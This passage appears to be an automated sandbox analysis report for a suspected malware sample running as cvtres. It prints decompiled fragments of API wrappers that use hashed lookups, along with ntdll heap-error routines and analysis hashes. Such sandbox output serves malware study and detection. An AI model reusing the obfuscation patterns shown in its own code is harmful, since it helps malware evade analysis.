                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                        • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                                        • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                        • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004188A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 10 4188a0-4188d1 call 4191d0 RtlAllocateHeap
                                                                        C-Code - Quality: 100%
                                                                        			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x004188b7
                                                                        0x004188c2
                                                                        0x004188cd
                                                                        0x004188d1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: &5A
                                                                        • API String ID: 1279760036-1617645808
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 247 407280-4072ca call 41a130 call 41ad10 call 409b30 call 413e40 256 4072cc-4072de PostThreadMessageW 247->256 257 4072fe-407302 247->257 258 4072e0-4072fa call 409290 256->258 259 4072fd 256->259 258->259 259->257
                                                                        C-Code - Quality: 82%
                                                                        			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                        0x00407280
                                                                        0x0040728f
                                                                        0x00407293
                                                                        0x0040729e
                                                                        0x004072ae
                                                                        0x004072be
                                                                        0x004072c3
                                                                        0x004072ca
                                                                        0x004072cd
                                                                        0x004072da
                                                                        0x004072dc
                                                                        0x004072de
                                                                        0x004072fb
                                                                        0x004072fb
                                                                        0x00000000
                                                                        0x004072fd
                                                                        0x00407302

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                        • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                        • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                        • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004188E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 4188e0-418911 call 4191d0 RtlFreeHeap
                                                                        C-Code - Quality: 100%
                                                                        			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x004188ef
                                                                        0x004188f7
                                                                        0x0041890d
                                                                        0x00418911

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418912 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 297 418912-418948 call 4191d0 ExitProcess
                                                                        C-Code - Quality: 37%
                                                                        			E00418912() {
				int _v0;
				intOrPtr _v4;
				void* _t7;
				void* _t12;
				void* _t17;
				intOrPtr _t24;

				asm("cld");
				asm("stc");
				_t17 = _t7;
				_push(_t12);
				_push(ss);
				 *((intOrPtr*)(_t12 - 0xe35f1b6)) = _t24;
				asm("sbb al, 0x55");
				_t9 = _v4;
				E004191D0(_t17, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}









                                                                        0x00418912
                                                                        0x00418913
                                                                        0x00418915
                                                                        0x00418916
                                                                        0x00418917
                                                                        0x00418918
                                                                        0x0041891f
                                                                        0x00418923
                                                                        0x0041893a
                                                                        0x00418948

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 28776aac2f16ee3d67861dbfa65cfffec2a271453a3cee4f2503ce4ae176f1f6
                                                                        • Instruction ID: 792586ff773140c8e7ff75dde3ffbfcd1cfead3b17e2d01f8ecf357b642712cc
                                                                        • Opcode Fuzzy Hash: 28776aac2f16ee3d67861dbfa65cfffec2a271453a3cee4f2503ce4ae176f1f6
                                                                        • Instruction Fuzzy Hash: 34E04F71600208BFD720DB68CC89FD73B68EF48780F0444A4B9586B281CA70AA44C6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x00418a5a
                                                                        0x00418a70
                                                                        0x00418a74

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418920 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                        0x00418923
                                                                        0x0041893a
                                                                        0x00418948

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 349ef1b53e92812b1ed72b38f2411b15fc3f557ff57fbbe74b865e106e20a01f
                                                                        • Instruction ID: c35c5613037bc05f5e44324919e1355c7962ac647aa0da11267ca60c389bb24b
                                                                        • Opcode Fuzzy Hash: 349ef1b53e92812b1ed72b38f2411b15fc3f557ff57fbbe74b865e106e20a01f
                                                                        • Instruction Fuzzy Hash: 92B09B719414C5C5D615D7604608B27796177D1745F57C052D2020641A4778C0D1F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0565B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • The resource is owned shared by %d threads, xrefs: 0565B37E
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0565B3C5
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0565B2F3
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0565B53F
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0565B2DC
                                                                        • *** enter .exr %p for the exception record, xrefs: 0565B4F1
                                                                        • a NULL pointer, xrefs: 0565B4E0
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0565B48F
                                                                        • The critical section is owned by thread %p., xrefs: 0565B3B9
                                                                        • write to, xrefs: 0565B4A6
                                                                        • read from, xrefs: 0565B4AD, 0565B4B2
                                                                        • <unknown>, xrefs: 0565B27E, 0565B2D1, 0565B350, 0565B399, 0565B417, 0565B48E
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0565B47D
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0565B38F
                                                                        • This failed because of error %Ix., xrefs: 0565B446
                                                                        • *** enter .cxr %p for the context, xrefs: 0565B50D
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0565B314
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0565B432
                                                                        • *** then kb to get the faulting stack, xrefs: 0565B51C
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0565B39B
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0565B3D6
                                                                        • an invalid address, %p, xrefs: 0565B4CF
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0565B484
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0565B374
                                                                        • The instruction at %p tried to %s , xrefs: 0565B4B6
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0565B476
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0565B323
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0565B305
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0565B352
                                                                        • *** Inpage error in %ws:%s, xrefs: 0565B418
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 4274f7fbf74aa8f58e86c6d1b128272cdb071299cbd6173de4c2843f85812c6f
                                                                        • Instruction ID: 9a4e3d18e2e2c8e8d482800f63b77ef0e95c09dd7347ce76cd448122567dc39f
                                                                        • Opcode Fuzzy Hash: 4274f7fbf74aa8f58e86c6d1b128272cdb071299cbd6173de4c2843f85812c6f
                                                                        • Instruction Fuzzy Hash: F3810875A80200FFCF2A9E05CC8AD7B3F36BF5A661F444048F9062B221D6798552DBB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05661C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E05661C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x55848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E055AB150();
				} else {
					E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x569589c);
				E055AB150("Heap error detected at %p (heap handle %p)\n",  *0x56958a0);
				_t27 =  *0x5695898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05661E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E055AB150();
				} else {
					E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E055AB150("Error code: %d - %s\n",  *0x5695898);
				_t113 =  *0x56958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E055AB150("Parameter1: %p\n",  *0x56958a4);
				}
				_t115 =  *0x56958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E055AB150("Parameter2: %p\n",  *0x56958a8);
				}
				_t117 =  *0x56958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E055AB150("Parameter3: %p\n",  *0x56958ac);
				}
				_t119 =  *0x56958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x56958b4);
					E055AB150("Last known valid blocks: before - %p, after - %p\n",  *0x56958b0);
				} else {
					_t120 =  *0x56958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E055AB150();
				} else {
					E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E055AB150("Stack trace available at %p\n", 0x56958c0);
			}











                                                                        0x05661c10
                                                                        0x05661c16
                                                                        0x05661c1e
                                                                        0x05661c3d
                                                                        0x05661c3e
                                                                        0x05661c20
                                                                        0x05661c35
                                                                        0x05661c3a
                                                                        0x05661c44
                                                                        0x05661c55
                                                                        0x05661c5a
                                                                        0x05661c65
                                                                        0x05661c67
                                                                        0x00000000
                                                                        0x05661c6e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05661c67
                                                                        0x05661cdc
                                                                        0x05661ce5
                                                                        0x05661d04
                                                                        0x05661d05
                                                                        0x05661ce7
                                                                        0x05661cfc
                                                                        0x05661d01
                                                                        0x05661d0b
                                                                        0x05661d17
                                                                        0x05661d1f
                                                                        0x05661d25
                                                                        0x05661d30
                                                                        0x05661d4f
                                                                        0x05661d50
                                                                        0x05661d32
                                                                        0x05661d47
                                                                        0x05661d4c
                                                                        0x05661d61
                                                                        0x05661d67
                                                                        0x05661d68
                                                                        0x05661d6e
                                                                        0x05661d79
                                                                        0x05661d98
                                                                        0x05661d99
                                                                        0x05661d7b
                                                                        0x05661d90
                                                                        0x05661d95
                                                                        0x05661daa
                                                                        0x05661db0
                                                                        0x05661db1
                                                                        0x05661db7
                                                                        0x05661dc2
                                                                        0x05661de1
                                                                        0x05661de2
                                                                        0x05661dc4
                                                                        0x05661dd9
                                                                        0x05661dde
                                                                        0x05661df3
                                                                        0x05661df9
                                                                        0x05661dfa
                                                                        0x05661e00
                                                                        0x05661e0a
                                                                        0x05661e13
                                                                        0x05661e32
                                                                        0x05661e33
                                                                        0x05661e15
                                                                        0x05661e2a
                                                                        0x05661e2f
                                                                        0x05661e39
                                                                        0x05661e4a
                                                                        0x05661e02
                                                                        0x05661e02
                                                                        0x05661e08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05661e08
                                                                        0x05661e5b
                                                                        0x05661e7a
                                                                        0x05661e7b
                                                                        0x05661e5d
                                                                        0x05661e72
                                                                        0x05661e77
                                                                        0x05661e95

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: af3fc1aeeff10c447eb48aee92a6608def41e56b1f9c84032c26427b7c3145d0
                                                                        • Instruction ID: f5f5a546b7c5f7cace13841e5e36edf5074c3d1f5258d1d144bb4e4fb6f5f836
                                                                        • Opcode Fuzzy Hash: af3fc1aeeff10c447eb48aee92a6608def41e56b1f9c84032c26427b7c3145d0
                                                                        • Instruction Fuzzy Hash: 71610633A64145DFCB16EB84D49AD3973F9FB05930F09806AF40E6B700CA38AD41CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05664AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E05664AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E055AB150();
						} else {
							E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E055AB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0565FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
